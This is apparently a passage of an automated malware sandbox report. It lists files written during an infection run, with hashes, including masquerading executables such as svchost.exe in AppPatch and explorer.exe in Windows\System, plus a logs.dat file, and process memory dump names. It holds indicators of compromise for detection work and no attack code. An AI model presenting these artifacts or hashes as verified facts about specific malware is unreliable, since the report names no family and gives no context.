C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-process-l1-1-0.dll

MD5 98bf2202e52b98a742f24724bb534166
SHA1 60a24df76b24aa6946bb16ead9575c7828d264b0
SHA256 fe005d1a7908e36d4fd6cb2711de251462c9bebf99e4060687df11bd0bbedc8a
SHA512 d346eaf8a966720e47099293d91f2856c816acb7e5f952e6700e007ba176147218798648a4a3e1b928e7a46622ef3603aa4d909113fb02d5551c40ed0e243441

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-math-l1-1-0.dll

MD5 e07a207d5d3cc852aa6d60325b68ed03
SHA1 64ba9a5c2ca4b6af03e369a7c2a2b3c79cac6c51
SHA256 b8fdf7893ff152a08fbc4d3f962905da3161b0b9fe71393ab68c56199277e322
SHA512 0dbafab60618ec0c815ae91994490c55878c904af625ba6931fe0ea80eb229c98e367623e472e3b4c0e27e0af6feeb4d2cdacd4c426e1a99a1291b41cc52f666

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-locale-l1-1-0.dll

MD5 c74e10b82c8e652efdec8e4d6ad6deaa
SHA1 bad903bb9f9ecfda83f0db58d4b281ea458a06bd
SHA256 d42b2d466a81e8e64d8132fad0f4df61d33875449ead8d4f76732b04f74bbce6
SHA512 5cc4b0d7e862fd32e8374501d1b8798e369b19dc483cdb568915b48a956e4f0a79b1d2c59322394128a330fea7c939161a7af1787b4dc5f250e74f8df8805f6e

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-heap-l1-1-0.dll

MD5 5d3da2f634470ab215345829c1518456
SHA1 fec712a88415e68925f63257d3a20ab496c2aac0
SHA256 d2ed53111a652fde26c08504803f76301fce2fba04f33a7f250b5b2569e4f240
SHA512 16079ce0bcc9816297f23c95573bd52da08b29b90da4855b4315b3fa98947b1b35ffd30760064144f3f5647c27e0c1bd3aba623d17364fff45c9b2fa598a2ba8

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 10a42548fcf16732d354a6ed24f53ec5
SHA1 b6b28307c0cc79e0abef15ed25758947c1ccab85
SHA256 ca3e5b21f83d87a958ba7934c5e4d8e7939b2e9013fe2deaeba1f9088b4277bb
SHA512 ecebb5973ecf8f34115985ae24061c29a9d943592389a4e8f215df7408c770a1f7c6c8927d30403d5c43814a4b64ac622ec018be02532f88dbbca6d6208266ab

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-environment-l1-1-0.dll

MD5 e9d4a1374a200a6e195e3c5ab42e6bbd
SHA1 c0c79309a6ab14592b91087bec0cc519979e5ebf
SHA256 612df2aaf3435c2be575581d1b2deddcef33f1b53179acff3e4ac24a0fcd3d50
SHA512 1de9d70036eb5211184b3b40f671608cf75b539f6fd36b812facdd9722927eb8e5c4c579db6a360003d06cc139f2ddbda8d19de17cb3a36fcfb53e462a9d7b27

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-convert-l1-1-0.dll

MD5 17680cd553168e9126ca9d7437caecc7
SHA1 8acafcb5f01d3b01a7c48a3b91bdeeb8bf1cf841
SHA256 6438c683e376583f6368c582ce3caab274cf3f7d7320e7f6cda427ba338847ca
SHA512 146ae3230c213ffab4b2c7805374ccb5f53155266ba9213d8f22e073deef0bd733b9488c2091c3db037c1d1dfaa4bbfb90e2afd041a447603c25690681239ae3

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-crt-conio-l1-1-0.dll

MD5 eeafb70f56cc0052435c2268021588e9
SHA1 89c89278c2ac4846ac7b8bd4177965e6f8f3a750
SHA256 b529fed3875c6f4eecf2d9c012bc0e27cb2d124c2dd1da155f8337b4cb002030
SHA512 ce211b79f4d0dc942dbe1544d7e26e8e6f2c116dce6bc678aede9cb2104771758c0bd670e1eca2d5a9a6728346d093f44459e9791317b215c6ff73e47d1203f8

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-util-l1-1-0.dll

MD5 0793ca01735f1d6a40dd6767e06dbb67
SHA1 6abea799a4a6e94d5a68fab51e79734751e940c5
SHA256 cdf7915f619a728fb64c257bfaa8257ee2353bf3c0b88214d5624931a1ac247b
SHA512 33f703cea3b6cef3fcbd973812635129ef204c2b1590ffe027dbd55ba35cbd481cf769de16634bd02acbdbd59e6af52cad0964d4d36327606c1948f38048703f

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-timezone-l1-1-0.dll

MD5 566232dabd645dcd37961d7ec8fde687
SHA1 88a7a8c777709ae4b6d47bed6678d0192eb3bc3f
SHA256 1290d332718c47961052ebc97a3a71db2c746a55c035a32b72e5ff00eb422f96
SHA512 e5d549c461859445006a4083763ce855adbb72cf9a0bcb8958daa99e20b1ca8a82dec12e1062787e2ae8aee94224b0c92171a4d99ed348b94eab921ede205220

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 c1919eacf044d5c47cc2c83d3d9c9cd9
SHA1 0a80158c5999ea9f1c4ca11988456634d7491fcc
SHA256 9b82643497092524e0aed6cfbaf7467849cde82292313bbd745c61ed2fd32ea8
SHA512 ad2ccabbdc769cbeb3c0b4d8d647647c8f43d3c3f3c85ab638ce00665379f9a0f5bfc24fe25184003d180143c29da0c36c6d2c7ffeae68a81c27b90f69336cbe

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-synch-l1-2-0.dll

MD5 5da5938e0d3a9024f42d55e1fd4c0cd7
SHA1 7e83fec64b4c4a96cfcae26ced9a48d4447f12b7
SHA256 0ea1cf78c0be94554ff7cd17a9c863c951c1e1eaa54191d7f2b0e043697c8d00
SHA512 9a302c664bfddf509c0489af24a238b15612802c7d6dccbbfb57b39691b80af79ed35cab31e84424a34e0de32179054277ca09a0457b90c72af195f8328c82dd

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-synch-l1-1-0.dll

MD5 445571331c2fc8a153952a6980c1950a
SHA1 bea310d6243f2b25f2de8d8d69abaeb117cf2b82
SHA256 1dda55027f7d215442e11c88a82c95f312673b7e7454569e5c969c1c24047915
SHA512 853797dd50d0ad6018e7e7d11aefbca61653baa8c60b22fdd34133fce6bf6f02ed0c747457c2783e699e8e7097f14429286904267c13521ee9cb255d3ea79806

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-string-l1-1-0.dll

MD5 f6afbc523b86f27b93074bc04668d3f2
SHA1 6311708ab0f04cb82accc6c06ae6735a2c691c1d
SHA256 71c0c7c163d1a3d35e74f8d7299eb38ef7268af1fa276e9a3966761212c570f0
SHA512 9ab0c2d025525fe047e27769c3b2be7526ad0d0cbe76eb1e3a84dc2cff60ab3c4a218388892f600f7b3b003909ae133b0e7da19c9ba96b624fa8f5123c3a97cf

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 650c005113599fb8b0b2e0d357756ac7
SHA1 56791db00766dc400df477dcb4bd59c6fa509de6
SHA256 5f16a1131c8f00ebbe3c4b108bd772071a2d9b4ca01b669b8aeb3ffb43dabcda
SHA512 4bc54ad70b75f550e623311dc48ea0fd8ff71207f64127379fcd48027ee2458d27a2aaa454637b4f09d713cc9e1f2cc09bb6cd55b0c6b7ed25e52cb46827fff2

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-profile-l1-1-0.dll

MD5 82e58246846b6daf6ad4e4b208d322d4
SHA1 80f3b8460ab80d9abe54886417a6bc53fd9289fa
SHA256 f6eb755c146d0a0ebf59d24fb9e1e87dc0220b31b33c6acbc8bebaf31493c785
SHA512 e1a032846c6110758fbc8eb84dbd3d228e83b3200bf5820c67d9740f6f8c7e926e4c89b92e8d34721d84fd597ab64455fd3029138e35f22329af23f599afdadf

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-processthreads-l1-1-1.dll

MD5 e26a5e364a76bf00feaab920c535adbb
SHA1 411eaf1ca1d8f1aebcd816d93933561c927f2754
SHA256 b3c0356f64e583c8aca3b1284c6133540a8a12f94b74568fb78ddc36eac6ab15
SHA512 333e42eeea07a46db46f222e27429facaaf2ce8a433f0c39f5d5c72e67d894c813d3cf77880434f6373e0d8fffa3ef96d5f37e38dd4775491f3da2b569e9df59

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-processthreads-l1-1-0.dll

MD5 eaa2228507c1fbde1698256c01cd97b7
SHA1 c98936c79b769cf03e2163624b195c152324c88a
SHA256 4297033ef8061c797127f0382df24f69264dca5c14d4f5b6cd2bcca33e26c1f5
SHA512 8319949a1e1acca312dbe99dfd9eedd1b5e4a13946a6ff829d6792d72f0a3a618ce10140954c035a5390a5a6e3b8ae2f23513629007cd3b7a88d5fb6fd81d763

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 8b0fe1a0ea86820020d2662873425bc4
SHA1 3c2292c34a2b53b29f62cc57838e087e98498012
SHA256 070d8827798ee2aa4c2dc70d7faef8ef680eca4c46ecc2dad3ce16380cab1f82
SHA512 0c29c8fae6c5a8de2f0047cbe66e0b2ae7c30cbeced6df1ea2e472ba123bf9e542d9e6cd8eb06b4f0cbe2e343b7929cf25bce1e79937076bf1d0480d91d2c9b4

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 83a0b483d37ed23c6e67896d91cea3f0
SHA1 6b5045ed8717c5b9f50e6a23643357c8c024abdb
SHA256 d7511eb9191a63eb293af941667aa2318fa6da79f06119b280e0b11e6b6b1d25
SHA512 dab0203fc26c0249b7a8882d41365d82690d908db359c3a6880f41a1c4eebde51ae084bd123864c32d8574cb0a22cfbc94bcd8e33b51f37f49575e2b9de93807

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-memory-l1-1-0.dll

MD5 3abf2eb0c597131b05ee5b8550a13079
SHA1 5197da49b5e975675d1b954febb3738d6141f0c8
SHA256 ff611cc2cb492c84748fa148eda80dec0cb23fc3b71828475ecea29597c26cd8
SHA512 656213a8785fe937c38c58f0f01f693dc10dff1192b232f00fb18aa32c05c76a95566a9148462ea39b39f1740a7fee1c9ac9a90c6810f38512b3103d18c89b72

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-localization-l1-2-0.dll

MD5 f1d0595773886d101e684e772118d1ef
SHA1 290276053a75cbeb794441965284b18311ab355d
SHA256 040e1572da9a980392184b1315f27ebcdaf07a0d94ddf49cbd0d499f7cdb099a
SHA512 db57f4ae78f7062cfe392d6829c5975be91d0062ff06725c45c06a74e04ade8bcaf709cfebeba8146fb4396206141aa49572968ea240aa1cba909e43985dc3ee

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 0ccdef1404dbe551cd48604ff4252055
SHA1 38a8d492356dc2b1f1376bdeacab82d266a9d658
SHA256 4863006b0c2aa2a39dff2050b64fbbe448b3e28a239e9e58a9a6d32f5f5a3549
SHA512 0846489a418d2480e65f7bef4a564fe68fe554f4a603a6f372ddd03eed7ee6299649b61172a7a9ca9a9500a924c2642493cce1040fcd6601d5862c248c902e9e

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-interlocked-l1-1-0.dll

MD5 f8203547595aa86bfe2cf85e579de087
SHA1 ca31fc30201196931595ac90f87c53e736f64acf
SHA256 e2d698823ba78b85d221744f38d3f9e8acccd0eedbb62c13e7d0dff4a04bd2b1
SHA512 d0818ee6b1a775793305828ba59c6c0f721d3fe2fcaca5bbfe047f25a500243ab4486c368302636e1c3934becc88c8178606a29871fe019d68b932ad1be3ee1b

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-heap-l1-1-0.dll

MD5 aa20afdb5cbf1041d355a4234c2c1d45
SHA1 811f508bd33e89bbd13e37623b6e2e9e88fdcd7c
SHA256 ef6657aac4aa97a57e034fd5baf4490706128ffafce7c285dc8736b1f7ee4d09
SHA512 06740552875ff2df234ec76f45cce3c66b7d5280a3d1b90874799780ff534437e5dffacf9e40bfddc301507d833235e25eab8119ac80d2587a43a80d4f0068b8

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-handle-l1-1-0.dll

MD5 c79ccd7c5b752b1289980b0be29804c4
SHA1 2054a8f9ebf739adfcfc23534759ae52901c189f
SHA256 8e910589f3f9a27ed6ce1d4f2d579b4ef99cfa80c0bf6f59b48ba6556e1578a0
SHA512 92de7aec7f91f6f4f7cc3dd575b11ea0f4fe516682ba2d05d605380a785597bc953b575cf0ff722980f0849a65d8c4a14c7717eeed8631a7aac0cb626d050e75

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-file-l2-1-0.dll

MD5 cdfc83e189bda0ac9eab447671754e87
SHA1 cf597ee626366738d0ea1a1d8be245f26abbea72
SHA256 f4811f251c49c9ae75f9fe25890bacede852e4f1bfdc6685f49096253a43f007
SHA512 659ee46e210fcad6c778988a164ce3f69a137d05fb2699ff662540cbb281b38719017f1049d5189fafdae06c07a48d3d29dd98e11c1cae5d47768c243af37fe9

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-file-l1-2-0.dll

MD5 852904535068e569e2b157f3bca0c08f
SHA1 c79b4d109178f4ab8c19ab549286eee4edf6eddb
SHA256 202b77cd363fce7c09d9a59b5779f701767c8734cc17bbe8b9ece5a0619f2225
SHA512 3e814678c7aa0d3d3a637ce3048e3b472dbb01b2e2a5932e5b257aa76bf8de8117a38e2a352daff66939a73c1b971b302f5635ea1d826b8a3afa49f9b543a541

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-file-l1-1-0.dll

MD5 6ee268f365dc48d407c337d1c7924b0c
SHA1 3eb808e972ae127c5cfcd787c473526a0caee699
SHA256 eb50cc53863c5a1c0b2fe805d9ecefef3f2dbd0e749a6cc142f89406f4ffdb10
SHA512 914da19994d7c9b1b02adb118d0b9cb2fdd5433ee448b15e21445ecfc30941045246b7c389a2d9c59fb6487bb00426579b054c946e52982516d09b095279c4d9

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-fibers-l1-1-0.dll

MD5 221f63ee94e3ffb567d2342df588bebc
SHA1 4831d769ebe1f44bf4c1245ee319f1452d45f3cd
SHA256 fd7c5503aa81dea1de9baee318e6a53663f7a4634f42e116e83c6a0f36d11143
SHA512 3d36175eaa6dc035f2b26b5638e332408579aa461d663f1cf5a3e9df20e11a7cca982b80c9dcf35ba9a8bc4203ac2f64f5dc043b60a6f16720f4d4ce052096c9

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 586d46d392348ad2ee25404b9d005a4e
SHA1 4bece51a5daacf3c7dcff0edf34bcb813512027f
SHA256 2859fe2fe069e5f4300dd0106733750b1c8c67ee5d8788c4556b7d21c6da651d
SHA512 daad865dbb4ca7542d5bd50186ffa633a709bfe1cf79d0d98e738760634da49afef1c418357d9482dbe33fe995847e05f653b6e3bba00aa42badce47dd072115

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-debug-l1-1-0.dll

MD5 28840d7d1ea0a873fb8f91c3e93d6108
SHA1 0856b3ceb5e300510b9791b031fffceaa78ee929
SHA256 d3fad206a52d9b1dd954c37a45e63e691ebc7bfe8af27a87553203fb445224ce
SHA512 93596ec710bd738fcbddf4db0f102f537355bbbaea347d2314d62064d5110cf1deb3ecb6d1e0922f019351acfe2d1c694684d0e62e22c004d5a20a6cae5c7fe3

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-datetime-l1-1-0.dll

MD5 adf9263b966cea234762c0782aba6e78
SHA1 e97047edecf92a0b654f7a25efd5484f13ded88f
SHA256 10cd6bf518350f93ab4643f701efdac851cdd7a26a0d8bcabfbb2bd273e1f529
SHA512 56c09d786f4ba401d4827da4148d96b140f28f647a03ac6ab94f64de9be4c75ecb8b583efad28aa0c51356978caa96f0cb9d56cc4883ff42c1ee7f736e481c52

C:\Users\Admin\AppData\Local\Temp\_MEI43722\api-ms-win-core-console-l1-1-0.dll

MD5 a58f3fbbbbb1ecb4260d626b07be2cda
SHA1 aed4398a71905952064fc5da1191f57846bbd2d6
SHA256 89dd6fbea61edb8f1c934b7e5e822b4ce9bea939ff585c83c197e06a1fd8311a
SHA512 7fd371818932384b014d219bb318fb86c1787f3a58a3f08e904b7bbe3486f7ad6bc3776b335c178658c87efd663b913a14fb16d1e52198801659e132fa830d07

memory/2808-147-0x0000000000400000-0x0000000000441000-memory.dmp

memory/2064-158-0x0000000073D9E000-0x0000000073D9F000-memory.dmp

memory/4124-157-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2064-162-0x00000000001F0000-0x0000000000234000-memory.dmp

C:\Windows\SysWOW64\Mgkjhe32.exe

MD5 e9328d035b5f49286fe0969cd5b33890
SHA1 1f55a73d172a4ca6886a2d6cab8bdf2b49fbd2cf
SHA256 6b373aaca1d31344cb6bfd2f3e34092a34383f6abfcbeab15292da7eecc618d9
SHA512 3945cca9e4922d7c36477fea5ce13b702f3239f37c8835c755fe511aafc184805b4ddbea024830e4ee1dc39637028706f68e12346856e3942f66db32ed1b68eb

memory/2064-187-0x0000000004FD0000-0x00000000054CE000-memory.dmp

memory/2064-202-0x0000000073D90000-0x000000007447E000-memory.dmp

memory/4540-204-0x0000000000400000-0x0000000000441000-memory.dmp

memory/5088-203-0x0000000000400000-0x0000000000441000-memory.dmp

memory/3116-200-0x0000000000400000-0x0000000000441000-memory.dmp

memory/3352-199-0x0000000000400000-0x0000000000441000-memory.dmp

C:\Windows\SysWOW64\Phaeoagi.dll

MD5 6608edc10dd1873d57dd79785e9ed875
SHA1 12b18679af7d5eef37cf7bfbc5dbb86b0028bc07
SHA256 ad31b222a5c01a73580cf2910844d8bcb79038ae85e173878dfd67620c656ff3
SHA512 7043c57490711b83e8ee0ecab2b4d7913d661e554c8cde3994d6b181805fb4f753f563e308260e65b6d498b2d0c6940ba4df73d7f69061af4b71c6e7c4e632cf

memory/2064-190-0x0000000004AD0000-0x0000000004B62000-memory.dmp

memory/436-183-0x0000000000400000-0x0000000000441000-memory.dmp

memory/3296-171-0x0000000000400000-0x0000000000441000-memory.dmp

memory/2064-243-0x0000000004AB0000-0x0000000004ABA000-memory.dmp

memory/1892-245-0x0000000000400000-0x0000000000441000-memory.dmp

memory/2064-250-0x0000000004CB0000-0x0000000004CD8000-memory.dmp

memory/396-244-0x0000000000400000-0x0000000000435000-memory.dmp

memory/3932-283-0x0000000000400000-0x0000000000433000-memory.dmp

memory/2064-309-0x0000000073D9E000-0x0000000073D9F000-memory.dmp

memory/4952-505-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5996-506-0x0000000000400000-0x0000000000433000-memory.dmp

memory/3516-504-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5928-501-0x0000000000400000-0x0000000000443000-memory.dmp

memory/4008-510-0x0000000002260000-0x0000000002275000-memory.dmp

memory/5912-500-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5880-499-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5840-498-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5792-497-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5780-496-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5748-495-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5488-488-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5464-487-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5648-486-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5636-485-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5584-484-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5532-483-0x0000000000400000-0x000000000046E000-memory.dmp

memory/976-482-0x0000000000400000-0x0000000000450000-memory.dmp

memory/4540-449-0x0000000000400000-0x0000000000441000-memory.dmp

memory/5392-447-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5792-585-0x0000000000400000-0x0000000000435000-memory.dmp

memory/32-618-0x0000000000400000-0x000000000043B000-memory.dmp

memory/5532-628-0x0000000000400000-0x000000000046E000-memory.dmp

memory/5260-627-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5724-626-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5628-625-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5592-624-0x0000000000400000-0x0000000000435000-memory.dmp

memory/2804-617-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4924-616-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5356-610-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5216-609-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5168-635-0x0000000000400000-0x0000000000443000-memory.dmp

memory/1672-724-0x0000000001F90000-0x0000000001FA5000-memory.dmp

C:\046604.exe

MD5 3b5ef2ef358ac402ca0f0ef422da7d5c
SHA1 59e9f489a38d2436363e13e94bee5d654cf49fda
SHA256 d93fb90cb9c553cfb024341527662b0bd1145c3d0d93c55258e1449934624dd3
SHA512 ed5694ff061f4881404958afa6b3d9481a9c864b34dbb3fb4427b6ccac5539193b0acaccfb32a70292b074acc1c04695d14b632cded66b3ad4ac479576c94af7

C:\Windows\System\explorer.exe

MD5 718d7bb6a3aa9d2ab1ef713323232161
SHA1 55f9c5d4651288cdccb9b27669f4de81ea1f2469
SHA256 db62614996968b8ff4d106d9369fec3154ad6567470227cdf906424df77a9109
SHA512 39a07169addd78e6fce10b1460d8a220e45258c420038fb16fad08a3af7df0ebf25d45d3309cad6dc927ded491fea58e264ec3bf4328c7dd1e53d4758a7b72f0

memory/5712-813-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Windows\SysWOW64\Leoghn32.exe

MD5 a362114642b21082f2baa4c0d094639a
SHA1 270086f35a8ae47bec212827fe3ceedc0a05956f
SHA256 dd924cfa88d5dd5e0f8f90474ed5e6e3e047d216a315d7821037928fdd23008a
SHA512 a5882216a8f5fce07553afb0ef99cc497f55f614d3270b614c1f5abe5b7a18189d0af55c58a9ff365d750c660f676e4ffd277c44e8f0466a3678e70ae0915617

memory/2392-696-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5900-695-0x0000000000400000-0x000000000043E000-memory.dmp

memory/5780-694-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6092-693-0x0000000000400000-0x0000000000435000-memory.dmp

memory/3088-692-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5712-886-0x0000000000400000-0x0000000000429000-memory.dmp

memory/396-919-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Windows\SysWOW64\Qhakoa32.exe

MD5 33dd8ad21225c9a8627fbaef86ae0527
SHA1 f51bd94aa8904d8d80463b2c17e0a6ad8ba9a923
SHA256 9155bbf6332c8a62416c4fc00ba0ed8f4626fb9a065ce18c1f245c09e773b20b
SHA512 ac62fdadc3ec7e80a75ab665329f12ee1f998999a550554407272b387d39c7e9ed223040185f5657e718db761016cd82e9fb18fae3f8fec74aef1d03e04e5898

C:\Windows\SysWOW64\Dqiieebk.dll

MD5 10543fc56166485fe4b374eb8c26a4d6
SHA1 6ef87828b726032dd13534a066746cc41724d121
SHA256 7e864aba0adfc51a224fe288e7e8ae5fcfde25aa56a347597eca3812310ab8fd
SHA512 50fc0ec41b28dce89567b743528ef06d5c005dc45afa1c0062471d80c20401eeb9bc76cb7bf65c7cfc2028091fbe5a73b8c34c86ef6ae87501427eb8bd6fcc88

memory/5424-639-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4124-646-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4540-608-0x0000000000400000-0x0000000000435000-memory.dmp

memory/5248-607-0x0000000000400000-0x0000000000433000-memory.dmp

memory/4944-606-0x0000000000400000-0x0000000000434000-memory.dmp

memory/5444-605-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5996-587-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5880-584-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5840-582-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5928-580-0x0000000000400000-0x0000000000443000-memory.dmp

memory/2176-570-0x0000000000400000-0x0000000000435000-memory.dmp

memory/1348-569-0x0000000000400000-0x0000000000433000-memory.dmp

memory/6016-568-0x0000000000400000-0x0000000000435000-memory.dmp

memory/6064-567-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1480-564-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Windows\SysWOW64\Efdjgo32.exe

MD5 f95d7457b4cc55f38cbf02d8e63061ea
SHA1 a0c72314b148d6a35a90c2a670e88946e9f70252
SHA256 939f5b853d6dcf26f8f19794859c6fecd3e11766763537f9416d804322740f24
SHA512 a72baba9597fdee17eeca1fe642c27b1bd7bbb3d9ff94f2893e62301f172a42838fdb0769d04efe2203b60345d24e161e85f61ed758892e24e9c0bbf083951a8

C:\xxrffxr.exe

MD5 2ed23f293243032d0cb6a81283bacd9f
SHA1 6034dfba8193bb426c7519b1e2dbc1e9b9fbd997
SHA256 eabf29b87529dc59e6e2c5781194db6b9efce5a3511875b4a2ba4e272728dcc5
SHA512 b6f3a1e81ff7c4791a5c5005b6a471f87d9fe8eec03c4dde66c756f67fad19c7009e2f481b8c8970a88dc3835dcbdc24b597aab9620ae2620c399643fcf29089

C:\m8420.exe

MD5 a3958c08a3b688d2fa97cbff889e00af
SHA1 fc3a338055b1f6416afcbafa72eb8593c30df4de
SHA256 0431b58d2406c88c1c48a2f6d8affc0511b34336f81237d4bdf72293d6dd8a42
SHA512 fd315232711f669c38a7810dab399c133c0be019cc98e8e95148f701f9a57cfa3454f145621d44c390dd6f2776829f321eabf9ee9873305712698a564bcc8474

C:\Users\Admin\AppData\Local\Temp\Syslemtchpy.exe

MD5 7ed0d992af40431965b31fbdbc778318
SHA1 7d006d1e0a04daca5d59fb830d644621107ecad6
SHA256 9556010a1e55305604f499b442b0ef3d7befb28c1c3921fdbff0a2470c4f002b
SHA512 a9ec1d00e4d4bf9bc52ced5e317cd308ca60468661ca542b5dcd93d9aaff423eb6e9b7df1a5de51a9df84290da86cdb0901866c02453bad586420888d138aebd

C:\Windows\SysWOW64\shell.exe

MD5 66f217a5f051847f4ee590da6343bea0
SHA1 cad7757d20de671c52a30e01d618b6f4232ddff4
SHA256 97e424d5f69693fea1d0ff4285927d803695c35cc1b6ea2d76ff1d2a4cc7999a
SHA512 5dc16b7c85a55745b1143341a567748d9328c98b20c7e5d8f420b495a60b928aefee788dc87aa7c1997ae46ec19fabdfee109c54dbef61235185e0261a0c1d9b

C:\Windows\regsvr.exe

MD5 ee12ff2b7e6ea4788c62fdb82e9a8769
SHA1 32d1a569e36ff40e81f0d6d851ec5591c78527da
SHA256 9ecfef9aeac40801b4e378a2f0e17b56fc3a2b50ac2c0ed9d00f124cd27f4b9b
SHA512 7a55fa9f64f70e615664c1b103f0896921922a20df252d28696026477df3572987921ec96000a8d5b78a7d5cd2229168fb06073f97f212c168a27f63c15e2710

C:\Windows\System\XLwxJCN.exe

MD5 e08dfdb680279c51faba8688ddce7fa4
SHA1 662154b17c3afaf872701a85cf3ee336b1e6a3c8
SHA256 d2d1ea42399b81daa677471815dcbf86a1c5e02dcaf9b27e6ec0d74d382e7ca2
SHA512 f912f9fe37dcdcee76603e1f0888c75f7565753b9bf1ad7b9ab2712eae0be9adf82fb6b318346fe6767a57504bb1d1ffc91c32d652815ade86d784c4ea0b37e6

C:\Users\Admin\AppData\Roaming\logs.dat

MD5 e21bd9604efe8ee9b59dc7605b927a2a
SHA1 3240ecc5ee459214344a1baac5c2a74046491104
SHA256 51a3fe220229aa3fdddc909e20a4b107e7497320a00792a280a03389f2eacb46
SHA512 42052ad5744ad76494bfa71d78578e545a3b39bfed4c4232592987bd28064b6366a423084f1193d137493c9b13d9ae1faac4cf9cc75eb715542fa56e13ca1493

C:\Windows\AppPatch\svchost.exe

MD5 b02f8225358e3c1b9a75f1aa8618c302
SHA1 61eb80d375ef0ecb5a66878d9c8cee2816203314
SHA256 bebfccfa5391234e779b5973154667f19ec4bb5acdf93c2f1c8808d42f3cf600
SHA512 3b59ce7b94c884b8c1066459ad6829be1d66ebe4b2328cced77eb71394770fd4a6119a3318f4457cffd88ae9665f52c1b5aa606af87b490295bc917292649ee1

C:\Windows\SysWOW64\Jnhpoamf.exe

MD5 fe60783a6ff552fa8f0646496e6c44d7
SHA1 b7b361c0cb580062be66696ab5ac847b748ef6d9
SHA256 f9a0d9d387e915dac2adc78b23c44e5c3568366f9544d60b2eab3e0e82cd6b42
SHA512 dcda91d580cddc42f51fcf633fe50812bbdf38dce9d6ab6a7a9d35b2cfdead3cb5bdd66b5402a02fe47ab6c69dc056e05f1c219aa810e4300d5cde45d093baaa

C:\Windows\SysWOW64\Jhijqj32.exe

MD5 332bdc85286b969ab33981d564ac48a7
SHA1 5fde6c4f23bba8d617b794d9597256d1037582db
SHA256 8dec970b43e2c6864f8227cf3d97c343a817306cf3eb6cbe7ae696ff2ee48f86
SHA512 14af0f263d175c5e371dd150154c4f32ba62074a9cadd1db89d363194a46821e518cc12c46ff78a3b3fe94c0522773053c71ec55d652c7344c09be25088e8094

C:\Windows\SysWOW64\Gigheh32.exe

MD5 14aed92c95f21d01c66e9db6caf04f19
SHA1 0bd6d4330782ca76895266ea62df2ef5da7b570d
SHA256 f0f067b53177d76e81f67baf50f335fb6b8682851cb4b825a25ee52914e8998d
SHA512 35ea2d614d4e0bee585d66e4ddf9259c83a4a35056b0961bbecdde16228056b3fbad9585349a40b92248ae981e7821037e31d3ad23e89e4a95a61a0e8405ea66

C:\646084.exe

